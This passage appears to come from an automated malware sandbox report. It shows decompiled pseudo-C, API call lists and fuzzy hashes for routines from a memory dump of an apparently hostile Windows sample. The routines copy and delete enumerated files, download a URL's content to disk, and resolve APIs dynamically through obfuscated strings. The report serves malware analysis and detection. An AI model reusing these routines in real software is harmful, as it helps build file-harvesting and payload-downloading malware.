Part of subcall function 0040AD50: lstrcat.KERNEL32(?,00443C68), ref: 0040AE08
Part of subcall function 0040AD50: lstrcat.KERNEL32(?,025C61E8), ref: 0040AE1B
Part of subcall function 0040AD50: _strlen.LIBCMT ref: 0040AE3E

DeleteFileA.KERNEL32(?), ref: 0040B2F5
FindNextFileA.KERNEL32(00000000,?), ref: 0040B303
FindClose.KERNEL32(00000000), ref: 0040B312
_memset.LIBCMT ref: 0040B326
lstrcat.KERNEL32(?,025C8338), ref: 0040B33C
lstrlen.KERNEL32(?), ref: 0040B349
_memset.LIBCMT ref: 0040B374

Strings

%s\%s, xrefs: 0040B272

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: lstrcat$_memset$File$Findwsprintf$CloseCopyCountDeleteNextTick_malloc_rand_strlenlstrlen
String ID: %s\%s
API String ID: 736411317-4073750446
Opcode ID: beead93d7a1a808ac53cc3e25d1a6a7c56f27bd7f53444a6be7e3fd6eb613e14
Instruction ID: 04c5cddefaeb63cf1cb96fd2cb337938a718ba9e668130c3451ff5b367ccdb95
Opcode Fuzzy Hash: beead93d7a1a808ac53cc3e25d1a6a7c56f27bd7f53444a6be7e3fd6eb613e14
Instruction Fuzzy Hash: C44186B2A00218AFDB14EF60EC45FEF7378EB85701F404599F60593191EB75AA44CF6A

Uniqueness

Uniqueness Score: -1.00%

Function 0040B225 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 106
stringfileCOMMON

Download Yara Rule

C-Code - Quality: 35%

			E0040B225(void* __ebx) {
				void* __edi;
				void* __esi;
				void* _t32;
				intOrPtr _t33;
				void* _t35;
				void* _t37;
				intOrPtr _t41;
				void* _t50;
				intOrPtr _t52;
				void* _t71;
				void* _t72;
				void* _t73;
				void* _t74;
				signed int _t75;
				void* _t77;

				_t50 = __ebx;
				do {
					_push(".");
					_push(_t75 - 0x534);
					if( *0x464890() != 0) {
						_t37 =  *0x464890(_t75 - 0x534, "..");
						_t84 = _t37;
						if(_t37 != 0) {
							wsprintfA(_t75 - 0x420, "%s\\%s", _t73, _t75 - 0x534);
							E0042A2F0(_t75 - 0x114, 0, 0x104);
							_t41 =  *0x453978; // 0x25c13d0
							 *0x464860(_t75 - 0x114, _t41);
							 *0x464860(_t75 - 0x114, E00420520(_t71, _t84, 0x1a));
							CopyFileA(_t75 - 0x420, _t75 - 0x114, 1);
							E0040AD50(_t84, _t75 - 0x114,  *((intOrPtr*)(_t75 - 0x564)));
							_t77 = _t77 + 0x24;
							DeleteFileA(_t75 - 0x114);
						}
					}
				} while (FindNextFileA(_t71, _t75 - 0x560) != 0);
				FindClose(_t71);
				E0042A2F0(_t75 - 0x218, 0, 0x104);
				_t52 =  *0x453b6c; // 0x25c8338
				 *0x464860(_t75 - 0x218, _t52);
				_t32 =  *0x464758( *((intOrPtr*)(_t75 - 0x564)));
				_t33 =  *0x453ca0; // 0x0
				_t70 = _t75 - 0x218;
				E00429620(_t33, _t75 - 0x218,  *((intOrPtr*)(_t75 - 0x564)), _t32);
				_t35 = E0042A2F0(_t75 - 0x564, 0, 4);
				if( *((intOrPtr*)(_t75 + 0x1c)) >= 0x10) {
					_t70 =  *((intOrPtr*)(_t75 + 8));
					_push( *((intOrPtr*)(_t75 + 8)));
					_t35 = E0042A289();
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t75 - 0xc));
				_pop(_t72);
				_pop(_t74);
				return E0042A36A(_t35, _t50,  *(_t75 - 0x10) ^ _t75, _t70, _t72, _t74);
			}

0x0040b225
0x0040b230
0x0040b230
0x0040b23b
0x0040b244
0x0040b256
0x0040b25c
0x0040b25e
0x0040b278
0x0040b28c
0x0040b291
0x0040b2a1
0x0040b2bc
0x0040b2d2
0x0040b2e6
0x0040b2eb
0x0040b2f5
0x0040b2f5
0x0040b25e
0x0040b309
0x0040b312
0x0040b326
0x0040b32b
0x0040b33c
0x0040b349
0x0040b356
0x0040b35c
0x0040b364
0x0040b374
0x0040b380
0x0040b382
0x0040b385
0x0040b386
0x0040b38b
0x0040b391
0x0040b399
0x0040b39a
0x0040b3a8

APIs

StrCmpCA.SHLWAPI(?,004456B0), ref: 0040B23C
StrCmpCA.SHLWAPI(?,004456AC), ref: 0040B256
wsprintfA.USER32 ref: 0040B278
_memset.LIBCMT ref: 0040B28C
lstrcat.KERNEL32(?,025C13D0), ref: 0040B2A1

Part of subcall function 00420520: _malloc.LIBCMT ref: 00420529
Part of subcall function 00420520: GetTickCount.KERNEL32 ref: 00420536
Part of subcall function 00420520: _rand.LIBCMT ref: 00420550
Part of subcall function 00420520: wsprintfA.USER32 ref: 00420565

lstrcat.KERNEL32(?,00000000), ref: 0040B2BC
CopyFileA.KERNEL32(?,?,00000001), ref: 0040B2D2

Part of subcall function 0040AD50: _memset.LIBCMT ref: 0040AD99
Part of subcall function 0040AD50: _memset.LIBCMT ref: 0040ADAB
Part of subcall function 0040AD50: lstrcat.KERNEL32(?,00000000), ref: 0040ADCE
Part of subcall function 0040AD50: lstrcat.KERNEL32(?,025C8AF8), ref: 0040ADE2
Part of subcall function 0040AD50: lstrcat.KERNEL32(?,?), ref: 0040ADF6
Part of subcall function 0040AD50: lstrcat.KERNEL32(?,00443C68), ref: 0040AE08
Part of subcall function 0040AD50: lstrcat.KERNEL32(?,025C61E8), ref: 0040AE1B
Part of subcall function 0040AD50: _strlen.LIBCMT ref: 0040AE3E

DeleteFileA.KERNEL32(?), ref: 0040B2F5
FindNextFileA.KERNEL32(00000000,?), ref: 0040B303
FindClose.KERNEL32(00000000), ref: 0040B312
_memset.LIBCMT ref: 0040B326
lstrcat.KERNEL32(?,025C8338), ref: 0040B33C
lstrlen.KERNEL32(?), ref: 0040B349
_memset.LIBCMT ref: 0040B374

Strings

%s\%s, xrefs: 0040B272

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: lstrcat$_memset$File$Findwsprintf$CloseCopyCountDeleteNextTick_malloc_rand_strlenlstrlen
String ID: %s\%s
API String ID: 736411317-4073750446
Opcode ID: b299d1a71b54744d502a650dc76af6b794b263181672408840e0b4e55ed92e6c
Instruction ID: 1fe862e2473fde48c6bbde3fbeec02c947c116c30921068636d5ce110a5b0711
Opcode Fuzzy Hash: b299d1a71b54744d502a650dc76af6b794b263181672408840e0b4e55ed92e6c
Instruction Fuzzy Hash: 064174B2A00218AFDB14EB60EC45FEF7378EB85701F4045A9F605A3191EB75A644CF6A

Uniqueness

Uniqueness Score: -1.00%

Function 004141D9 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 102
networkfilesleepCOMMON

Download Yara Rule

C-Code - Quality: 56%

			E004141D9() {
				void* __ebx;
				void* __edi;
				intOrPtr _t22;
				int _t29;
				long _t31;
				void* _t37;
				void* _t38;
				char* _t49;
				void* _t50;
				void* _t51;
				void* _t52;
				void* _t53;
				signed int _t54;

				do {
					_push(0);
					if( *((intOrPtr*)(_t54 - 0x510)) == 0) {
						_push(0x100);
					} else {
						_push(0x800100);
					}
					_t52 = InternetOpenUrlA(_t37, _t49, 0, 0, ??, ??);
					if(HttpQueryInfoA(_t52, 0x13, _t54 - 0x104, _t54 - 0x514, 0) == 0) {
						goto L7;
					} else {
						_push("200");
						_push(_t54 - 0x104);
						if( *0x464890() != 0) {
							Sleep(0x3e8);
							goto L7;
						}
					}
					break;
					L7:
					_t22 =  *((intOrPtr*)(_t54 - 0x50c)) + 1;
					 *((intOrPtr*)(_t54 - 0x50c)) = _t22;
				} while (_t22 < 3);
				_t50 = CreateFileA( *(_t54 - 0x518), 0x40000000, 3, 0, 2, 0x80, 0);
				if(InternetReadFile(_t52, _t54 - 0x504, 0x400, _t54 - 0x508) != 0) {
					do {
						_t31 =  *(_t54 - 0x508);
						if(_t31 == 0) {
							goto L12;
						} else {
							if(WriteFile(_t50, _t54 - 0x504, _t31, _t54 - 0x51c, 0) != 0) {
								_t31 =  *(_t54 - 0x508);
								if(_t31 ==  *(_t54 - 0x51c)) {
									goto L12;
								}
							}
						}
						goto L14;
						L12:
					} while (_t31 >= 0x400 && InternetReadFile(_t52, _t54 - 0x504, 0x400, _t54 - 0x508) != 0);
				}
				L14:
				_t47 = _t54 - 0x504;
				E0042A2F0(_t54 - 0x504, 0, 0x400);
				CloseHandle(_t50);
				InternetCloseHandle(_t52);
				_t29 = InternetCloseHandle(_t37);
				_pop(_t51);
				_pop(_t53);
				_pop(_t38);
				return E0042A36A(_t29, _t38,  *(_t54 - 4) ^ _t54, _t47, _t51, _t53);
			}

0x004141e0
0x004141e7
0x004141e9
0x004141f2
0x004141eb
0x004141eb
0x004141eb
0x00414213
0x00414220
0x00000000
0x00414222
0x00414222
0x0041422d
0x00414236
0x0041423d
0x00000000
0x0041423d
0x00414236
0x00000000
0x00414243
0x00414249
0x0041424a
0x00414250
0x0041427b
0x00414292
0x00414294
0x00414294
0x0041429c
0x00000000
0x0041429e
0x004142b8
0x004142ba
0x004142c6
0x00000000
0x00000000
0x004142c6
0x004142b8
0x00000000
0x004142c8
0x004142c8
0x00414294
0x004142ed
0x004142f2
0x004142fb
0x00414304
0x0041430b
0x00414312
0x0041431b
0x0041431c
0x0041431f
0x00414328

APIs

InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 004141FD
HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00414218
StrCmpCA.SHLWAPI(?,200), ref: 0041422E
Sleep.KERNEL32(000003E8), ref: 0041423D
CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 0041426E
InternetReadFile.WININET(00000000,?,00000400,?), ref: 0041428A
WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 004142B0
InternetReadFile.WININET(00000000,?,00000400,?), ref: 004142E3
_memset.LIBCMT ref: 004142FB
CloseHandle.KERNEL32(00000000), ref: 00414304
InternetCloseHandle.WININET(00000000), ref: 0041430B
InternetCloseHandle.WININET(00000000), ref: 00414312

Strings

200, xrefs: 00414222

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: Internet$File$CloseHandle$Read$CreateHttpInfoOpenQuerySleepWrite_memset
String ID: 200
API String ID: 2218496262-556920499
Opcode ID: 7a4fd4d002d420266723cd2adde73a4e35dff160c2309455aade77d2c1f0a257
Instruction ID: 188ff8cbb64ed805553f3951005ea27f3137892eb0b99917536c10f28c28145d
Opcode Fuzzy Hash: 7a4fd4d002d420266723cd2adde73a4e35dff160c2309455aade77d2c1f0a257
Instruction Fuzzy Hash: 62315075640614ABDB209B50EC49FEF7378EB85B06F004195F605E61C0EBB89BC1CF69

Uniqueness

Uniqueness Score: -1.00%

Function 00418030 Relevance: 22.8, APIs: 7, Strings: 6, Instructions: 64
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00418030(void* __ecx, signed int _a4, char* _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v24;
				signed int _t31;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t39;
				signed char _t46;

				_t31 = _a4 & 0x00000017;
				 *(__ecx + 0xc) = _t31;
				_t46 =  *(__ecx + 0x10) & _t31;
				if(_t46 != 0) {
					if(_a8 != 0) {
						E0042C5C1(0, 0);
					}
					if((_t46 & 0x00000004) != 0) {
						_t39 = E00429E33();
						_a8 = "ios_base::badbit set";
						E0042BF4E( &_v24,  &_a8);
						_t46 =  &_v24;
						_v12 = 1;
						_v8 = _t39;
						_v24 = 0x446374;
						E0042C5C1(_t46, 0x44beec);
					}
					if((_t46 & 0x00000002) != 0) {
						_t35 = E00429E33();
						_t17 =  &_v24; // 0x446374
						_a8 = "ios_base::failbit set";
						E0042BF4E(_t17,  &_a8);
						_t19 =  &_v24; // 0x446374
						_v12 = 1;
						_v8 = _t35;
						_v24 = 0x446374;
						E0042C5C1(_t19, 0x44beec);
					}
					_t32 = E00429E33();
					_a8 = "ios_base::eofbit set";
					E0042BF4E( &_v24,  &_a8);
					_v12 = 1;
					_v8 = _t32;
					_v24 = 0x446374;
					return E0042C5C1( &_v24, 0x44beec);
				}
				return _t31;
			}

0x00418036
0x00418039
0x00418042
0x00418044
0x0041804e
0x00418054
0x00418054
0x00418061
0x00418063
0x00418071
0x00418078
0x00418082
0x00418086
0x00418089
0x0041808c
0x00418093
0x00418093
0x0041809b
0x0041809d
0x004180a6
0x004180ab
0x004180b2
0x004180bc
0x004180c0
0x004180c3
0x004180c6
0x004180cd
0x004180cd
0x004180d2
0x004180e0
0x004180e7
0x004180f5
0x004180f8
0x004180fb
0x00000000
0x00418102
0x0041810a

APIs

__CxxThrowException@8.LIBCMT ref: 00418054

Part of subcall function 0042C5C1: RaiseException.KERNEL32(?,?,0042C5C0,?,?,?,?,?,0042C5C0,?,0044B220,00464BA8), ref: 0042C603

std::exception::exception.LIBCMT ref: 00418078
__CxxThrowException@8.LIBCMT ref: 00418093
std::exception::exception.LIBCMT ref: 004180B2
__CxxThrowException@8.LIBCMT ref: 004180CD
std::exception::exception.LIBCMT ref: 004180E7
__CxxThrowException@8.LIBCMT ref: 00418102

Strings

ios_base::failbit set, xrefs: 004180AB
ios_base::badbit set, xrefs: 00418071
tcD, xrefs: 004180A6, 004180BC, 004180BF
ios_base::eofbit set, xrefs: 004180E0
tcD, xrefs: 004180DB, 004180F1, 00418082, 0041806E, 004180F4
|cD, xrefs: 004180D7, 004180DA

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: Exception@8Throw$std::exception::exception$ExceptionRaise
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set$tcD$tcD$|cD
API String ID: 4237746311-2666145788
Opcode ID: 79f69f034eeebe5f1a93b3050c30f6bf5cc6f37ddad168c4d57c74fbaa68c0d4
Instruction ID: 85580b190a5a5348e61c9c273b66a07224fcc72903260d8cca0921021aa9635b
Opcode Fuzzy Hash: 79f69f034eeebe5f1a93b3050c30f6bf5cc6f37ddad168c4d57c74fbaa68c0d4
Instruction Fuzzy Hash: 562186B190021CAADB04DF95D942BEEB7F49F44304F61C04FE90567241DB789B44CFAA

Uniqueness

Uniqueness Score: -1.00%

Function 004242B0 Relevance: 22.6, APIs: 15, Instructions: 98
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E004242B0() {
				CHAR* _t1;
				struct HINSTANCE__* _t2;
				struct HINSTANCE__* _t3;
				_Unknown_base(*)()* _t4;
				_Unknown_base(*)()* _t5;
				struct HINSTANCE__* _t6;
				_Unknown_base(*)()* _t7;
				intOrPtr _t8;
				CHAR* _t9;
				_Unknown_base(*)()* _t10;
				struct HINSTANCE__* _t11;
				_Unknown_base(*)()* _t12;
				_Unknown_base(*)()* _t13;
				CHAR* _t14;
				_Unknown_base(*)()* _t15;
				struct HINSTANCE__* _t16;
				_Unknown_base(*)()* _t17;
				_Unknown_base(*)()* _t18;
				CHAR* _t19;
				_Unknown_base(*)()* _t20;
				struct HINSTANCE__* _t21;
				_Unknown_base(*)()* _t22;
				_Unknown_base(*)()* _t23;
				CHAR* _t24;
				CHAR* _t26;
				CHAR* _t27;
				intOrPtr _t28;
				struct HINSTANCE__* _t29;
				CHAR* _t30;
				struct HINSTANCE__* _t31;
				CHAR* _t32;
				struct HINSTANCE__* _t33;
				CHAR* _t34;
				struct HINSTANCE__* _t35;
				CHAR* _t36;
				CHAR* _t37;
				struct HINSTANCE__* _t38;
				CHAR* _t39;
				struct HINSTANCE__* _t40;
				CHAR* _t41;
				struct HINSTANCE__* _t42;
				CHAR* _t43;
				struct HINSTANCE__* _t44;
				void* _t45;

				_t1 =  *0x453450; // 0x25c11f0
				_t2 = LoadLibraryA(_t1);
				 *0x4648ac = _t2;
				if(_t2 != 0) {
					_t27 =  *0x453534; // 0x25c1078
					_t5 = GetProcAddress(_t2, _t27);
					_t37 =  *0x4537ec; // 0x25c10a8
					 *0x464854 = _t5;
					_t6 =  *0x4648ac; // 0x74ca0000
					_t7 = GetProcAddress(_t6, _t37);
					_t28 =  *0x453afc; // 0x25c1090
					_t38 =  *0x4648ac; // 0x74ca0000
					 *0x4647b4 = _t7;
					_t8 =  *_t7(_t38, _t28, _t45);
					_t29 =  *0x4648ac; // 0x74ca0000
					 *0x464860 = _t8;
					_t9 =  *0x45367c; // 0x25c10c0
					_t10 = GetProcAddress(_t29, _t9);
					_t39 =  *0x4533bc; // 0x25c10d0
					 *0x4646d0 = _t10;
					_t11 =  *0x4648ac; // 0x74ca0000
					_t12 = GetProcAddress(_t11, _t39);
					_t30 =  *0x453ba0; // 0x25c10e8
					_t40 =  *0x4648ac; // 0x74ca0000
					 *0x4647fc = _t12;
					_t13 = GetProcAddress(_t40, _t30);
					_t31 =  *0x4648ac; // 0x74ca0000
					 *0x4647c4 = _t13;
					_t14 =  *0x45355c; // 0x25c1100
					_t15 = GetProcAddress(_t31, _t14);
					_t41 =  *0x4536c0; // 0x25c1120
					 *0x4648dc = _t15;
					_t16 =  *0x4648ac; // 0x74ca0000
					_t17 = GetProcAddress(_t16, _t41);
					_t32 =  *0x45379c; // 0x25c1140
					_t42 =  *0x4648ac; // 0x74ca0000
					 *0x464894 = _t17;
					_t18 = GetProcAddress(_t42, _t32);
					_t33 =  *0x4648ac; // 0x74ca0000
					 *0x46480c = _t18;
					_t19 =  *0x453ab8; // 0x25c1158
					_t20 = GetProcAddress(_t33, _t19);
					_t43 =  *0x453940; // 0x25c1170
					 *0x464734 = _t20;
					_t21 =  *0x4648ac; // 0x74ca0000
					_t22 = GetProcAddress(_t21, _t43);
					_t34 =  *0x453430; // 0x25c1188
					_t44 =  *0x4648ac; // 0x74ca0000
					 *0x464834 = _t22;
					_t23 = GetProcAddress(_t44, _t34);
					_t35 =  *0x4648ac; // 0x74ca0000
					 *0x464808 = _t23;
					_t24 =  *0x453b74; // 0x25c11a0
					 *0x464838 = GetProcAddress(_t35, _t24);
				}
				_t36 =  *0x453a24; // 0x25c11c0
				_t3 = LoadLibraryA(_t36);
				 *0x464698 = _t3;
				if(_t3 != 0) {
					_t26 =  *0x453944; // 0x25c11d8
					_t4 = GetProcAddress(_t3, _t26);
					 *0x46478c = _t4;
					return _t4;
				}
				return _t3;
			}

0x004242b0
0x004242b6
0x004242bc
0x004242c3
0x004242c9
0x004242d8
0x004242da
0x004242e0
0x004242e5
0x004242ec
0x004242ee
0x004242f4
0x004242fc
0x00424301
0x00424303
0x00424309
0x0042430e
0x00424315
0x0042431b
0x00424321
0x00424326
0x0042432d
0x00424333
0x00424339
0x00424341
0x00424346
0x0042434c
0x00424352
0x00424357
0x0042435e
0x00424364
0x0042436a
0x0042436f
0x00424376
0x0042437c
0x00424382
0x0042438a
0x0042438f
0x00424395
0x0042439b
0x004243a0
0x004243a7
0x004243ad
0x004243b3
0x004243b8
0x004243bf
0x004243c5
0x004243cb
0x004243d3
0x004243d8
0x004243de
0x004243e4
0x004243e9
0x004243f6
0x004243fb
0x004243fc
0x00424403
0x00424409
0x00424410
0x00424412
0x0042441a
0x00424420
0x00000000
0x00424420
0x00424425

APIs

LoadLibraryA.KERNEL32(025C11F0,00410C2E), ref: 004242B6
GetProcAddress.KERNEL32(00000000,025C1078), ref: 004242D8
GetProcAddress.KERNEL32(74CA0000,025C10A8), ref: 004242EC
GetProcAddress.KERNEL32(74CA0000,025C10C0), ref: 00424315
GetProcAddress.KERNEL32(74CA0000,025C10D0), ref: 0042432D
GetProcAddress.KERNEL32(74CA0000,025C10E8), ref: 00424346
GetProcAddress.KERNEL32(74CA0000,025C1100), ref: 0042435E
GetProcAddress.KERNEL32(74CA0000,025C1120), ref: 00424376
GetProcAddress.KERNEL32(74CA0000,025C1140), ref: 0042438F
GetProcAddress.KERNEL32(74CA0000,025C1158), ref: 004243A7
GetProcAddress.KERNEL32(74CA0000,025C1170), ref: 004243BF
GetProcAddress.KERNEL32(74CA0000,025C1188), ref: 004243D8
GetProcAddress.KERNEL32(74CA0000,025C11A0), ref: 004243F0
LoadLibraryA.KERNEL32(025C11C0), ref: 00424403
GetProcAddress.KERNEL32(00000000,025C11D8), ref: 0042441A

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID:
API String ID: 2238633743-0
Opcode ID: 27d38a5a0b2f59a8968a002ac3380acf549dbd64f4c1f0240f0a6a10dbc9daf2
Instruction ID: 656938a1530f13d5700d70891583bb826315f76204fef7e62df63afdf46fb320
Opcode Fuzzy Hash: 27d38a5a0b2f59a8968a002ac3380acf549dbd64f4c1f0240f0a6a10dbc9daf2
Instruction Fuzzy Hash: EC4142B9511240AFDB44EFA8ED5892677E9FBC9742300853AE905C3361F7B4E940DF2A

Uniqueness

Uniqueness Score: -1.00%

Function 00426AB0 Relevance: 18.2, APIs: 12, Instructions: 213
fileCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E00426AB0(void* __ebx, void* _a4, signed int* _a8, long* _a12, intOrPtr* _a16, signed int _a20) {
				signed int _v8;
				struct _SYSTEMTIME _v24;
				signed int _v52;
				intOrPtr _v60;
				intOrPtr _v68;
				struct _BY_HANDLE_FILE_INFORMATION _v76;
				void _v80;
				long _v84;
				long _v88;
				struct _FILETIME _v96;
				void _v100;
				signed int* _v104;
				void _v108;
				long* _v112;
				void* __edi;
				void* __esi;
				signed int _t58;
				signed char _t63;
				long _t64;
				signed int* _t65;
				long* _t66;
				intOrPtr _t77;
				long _t87;
				void _t91;
				signed int _t95;
				signed int _t96;
				signed int _t97;
				long _t98;
				void* _t99;
				signed int _t102;
				intOrPtr _t114;
				intOrPtr _t137;
				intOrPtr* _t139;
				signed int* _t140;
				void* _t141;
				signed int _t142;
				signed int _t143;

				_t58 =  *0x451f00; // 0xc21d6f0a
				_v8 = _t58 ^ _t143;
				_t124 = _a20;
				_t141 = _a4;
				_t139 = _a16;
				_v104 = _a8;
				_v112 = _a12;
				_v96.dwHighDateTime = _a20;
				if(GetFileInformationByHandle(_t141,  &_v76) != 0) {
					_t63 = _v76.dwFileAttributes;
					_push(__ebx);
					_t95 = 0;
					_t126 = _t63 & 0x00000001;
					if(_t126 != 0) {
						_t95 = 1;
					}
					if((_t63 & 0x00000002) != 0) {
						_t95 = _t95 | 0x00000002;
					}
					if((_t63 & 0x00000004) != 0) {
						_t95 = _t95 | 0x00000004;
					}
					_t102 = _t63 & 0x00000010;
					if(_t102 != 0) {
						_t95 = _t95 | 0x00000010;
					}
					if((_t63 & 0x00000020) != 0) {
						_t95 = _t95 | 0x00000020;
					}
					if(_t102 == 0) {
						_t96 = _t95 | 0x80000000;
					} else {
						_t96 = _t95 | 0x40000000;
					}
					_t97 = _t96 | 0x01000000;
					if(_t126 == 0) {
						_t97 = _t97 | 0x00800000;
					}
					_t64 = GetFileSize(_t141, 0);
					_v84 = _t64;
					if(_t64 > 0x28) {
						SetFilePointer(_t141, 0, 0, 0);
						ReadFile(_t141,  &_v80, 2,  &_v88, 0);
						SetFilePointer(_t141, 0x24, 0, 0);
						ReadFile(_t141,  &_v108, 4,  &_v88, 0);
						_t126 = 0x54ad;
						if(_v80 == 0x54ad) {
							_t87 = _v108;
							if(_v84 > _t87 + 0x34) {
								SetFilePointer(_t141, _t87, 0, 0);
								_t126 =  &_v88;
								ReadFile(_t141,  &_v100, 4,  &_v88, 0);
								_t91 = _v100;
								if(_t91 == 0x5a4d || _t91 == 0x454e || _t91 == 0x454c || _t91 == 0x4550) {
									_t97 = _t97 | 0x00400000;
								}
							}
						}
					}
					_t65 = _v104;
					if(_t65 != 0) {
						 *_t65 = _t97;
					}
					_t66 = _v112;
					if(_t66 != 0) {
						 *_t66 = _v84;
					}
					_t142 = _v52;
					_t98 = _v76.ftLastWriteTime;
					if(_t139 != 0) {
						_t137 = _v76.ftLastAccessTime - 0xd53e8000;
						asm("sbb eax, 0x19db1de");
						_t77 = E0042CF60(_t137, _v60, 0x989680, 0);
						 *((intOrPtr*)(_t139 + 4)) = _t137;
						_t126 = _t142;
						asm("sbb edx, 0x19db1de");
						 *_t139 = _t77;
						 *((intOrPtr*)(_t139 + 8)) = E0042CF60(_t98 - 0xd53e8000, _t126, 0x989680, 0);
						asm("sbb ecx, 0x19db1de");
						 *(_t139 + 0xc) = _t126;
						 *((intOrPtr*)(_t139 + 0x10)) = E0042CF60(_v76.ftCreationTime - 0xd53e8000, _v68, 0x989680, 0);
						 *(_t139 + 0x14) = _t126;
					}
					_t140 = _v96.dwHighDateTime;
					if(_t140 != 0) {
						_v96.dwLowDateTime = _t98;
						_v96.dwHighDateTime = _t142;
						FileTimeToSystemTime( &_v96,  &_v24);
						_t114 = _v24.wSecond;
						_t126 = _t114 + _t114 & 0x0000001f;
						 *_t140 = ((_v24.wYear + 0xffffffc4 << 0x00000004 | _v24.wMonth & 0x0000000f) << 0x00000005 & 0x0000ffff | _v24.wDay & 0x0000001f) << 0x00000010 | (_v24.wMinute & 0x0000003f | _v24.wHour << 0x00000006) << 0x00000005 & 0x0000ffff | _t114 + _t114 & 0x0000001f;
					}
					_pop(_t99);
					return E0042A36A(0, _t99, _v8 ^ _t143, _t126, _t140, _t142);
				} else {
					return E0042A36A(0x200, __ebx, _v8 ^ _t143, _t124, _t139, _t141);
				}
			}

0x00426ab6
0x00426abd
0x00426ac6
0x00426aca
0x00426ace
0x00426ad1
0x00426ad9
0x00426adc
0x00426ae7
0x00426afe
0x00426b01
0x00426b04
0x00426b06
0x00426b09
0x00426b0b
0x00426b0b
0x00426b12
0x00426b14
0x00426b14
0x00426b19
0x00426b1b
0x00426b1b
0x00426b20
0x00426b23
0x00426b25
0x00426b25
0x00426b2a
0x00426b2c
0x00426b2c
0x00426b31
0x00426b3b
0x00426b33
0x00426b33
0x00426b33
0x00426b41
0x00426b49
0x00426b4b
0x00426b4b
0x00426b54
0x00426b5a
0x00426b60
0x00426b6d
0x00426b80
0x00426b8d
0x00426ba0
0x00426ba6
0x00426baf
0x00426bb1
0x00426bba
0x00426bc2
0x00426bca
0x00426bd5
0x00426bdb
0x00426be3
0x00426bfa
0x00426bfa
0x00426be3
0x00426bba
0x00426baf
0x00426c00
0x00426c05
0x00426c07
0x00426c07
0x00426c09
0x00426c0e
0x00426c13
0x00426c13
0x00426c15
0x00426c18
0x00426c1d
0x00426c27
0x00426c32
0x00426c39
0x00426c3e
0x00426c4b
0x00426c52
0x00426c5a
0x00426c64
0x00426c76
0x00426c7e
0x00426c86
0x00426c89
0x00426c89
0x00426c8c
0x00426c91
0x00426c9b
0x00426c9e
0x00426ca1
0x00426cd4
0x00426ce5
0x00426cea
0x00426cea
0x00426cef
0x00426cfe
0x00426aea
0x00426afd
0x00426afd

APIs

GetFileInformationByHandle.KERNEL32(?,?,0040A082,?), ref: 00426ADF
GetFileSize.KERNEL32(?,00000000,?), ref: 00426B54
SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 00426B6D
ReadFile.KERNEL32(?,?,00000002,?,00000000), ref: 00426B80
SetFilePointer.KERNEL32(?,00000024,00000000,00000000), ref: 00426B8D
ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 00426BA0
SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 00426BC2
ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 00426BD5

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: File$PointerRead$HandleInformationSize
String ID:
API String ID: 2979504256-0
Opcode ID: 254a83e90d3ec790deee9c9e577ab38e2abc0cb723854e5eb9e05c1c4bb99577
Instruction ID: d63d8d575c6cf1d9d13d67157ee5a151b7eda0a9bc96f410d892b47781d0c057
Opcode Fuzzy Hash: 254a83e90d3ec790deee9c9e577ab38e2abc0cb723854e5eb9e05c1c4bb99577
Instruction Fuzzy Hash: 8171C771B00224AFEB14DF94DC85BAEBBB5FF84700F55812AF905EB284D7B4A901CB58

Uniqueness

Uniqueness Score: -1.00%

Function 004095C0 Relevance: 17.8, APIs: 7, Strings: 3, Instructions: 250
COMMON

Download Yara Rule

C-Code - Quality: 88%

